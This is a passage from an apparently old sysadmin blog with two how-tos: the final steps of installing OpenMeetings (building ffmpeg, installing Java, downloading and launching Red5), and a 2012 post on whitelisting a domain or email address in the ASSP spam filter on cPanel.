# ./configure --enable-libmp3lame --enable-postproc --enable-gpl --enable-pthreads --enable-avfilter --prefix=/usr
# make all
# make install
-----------

8. Install Java:

----------
# yum -y install java-1.6.0-openjdk java-1.6.0-openjdk-devel
----------

+ Now, the final step is to install OpenMeetings on the server.

------------
# wget http://openmeetings.googlecode.com/files/openmeetings_1_9_1_r4707.zip
# unzip openmeetings_1_9_1_r4707.zip -d om
# cd om/red5/
# chmod 755 red5.sh
# ./red5.sh
------------

You have completed the installation of OpenMeetings.
Open a browser and enter the OpenMeetings installer URL:

----------
http://IPADDRESS:5080/openmeetings/install
----------

Fill in the admin username, password, etc., then click Install. The installation takes some time to complete.

Now you can access OpenMeetings using the following URL:

---------
http://IPADDRESS:5080
---------

Courtesy: Vishnuraj(Co worker).

Thursday, 5 January 2012

Whitelist a domain in ASSP spam filter

How to whitelist a domain in the ASSP spam filter? Also, how to whitelist an email account in the ASSP spam filter?

My cPanel server is running with the ASSP spam filter. A domain is blacklisted in the ASSP spam filter. How to whitelist it? Also, if I want to whitelist a single email account of that domain, how do I go about it?


Solution:

The solution is simple. ASSP is usually installed in its default path, "/usr/local/assp".

Whitelisting a domain and whitelisting an email account follow the same process.

1) Just vi the whitedomains.txt file

i.e. vi /usr/local/assp/files/whitedomains.txt

2) Add the domain name or email account to be whitelisted.

e.g.:

domain.com
hemanth@domain.com
admin@google.com

Save and quit.

3) Rebuild the ASSP spam database

Log in to cPanel and go to Grscripts ASSP Deluxe.


You can find the option "Rebuild SPAMdb". Click it.

That's it


or


Another method of whitelisting:


4.1) Log in to the ASSP web interface available in cPanel.


4.2) Then go to the "Whitelisting domains" option.


4.3) Add the domain names or email IDs in the "whitelist or Address" option.


4.4) Scroll down and click "Apply Changes".


4.5) Log out of the ASSP web interface.


4.6) Rebuild the spam database in ASSP.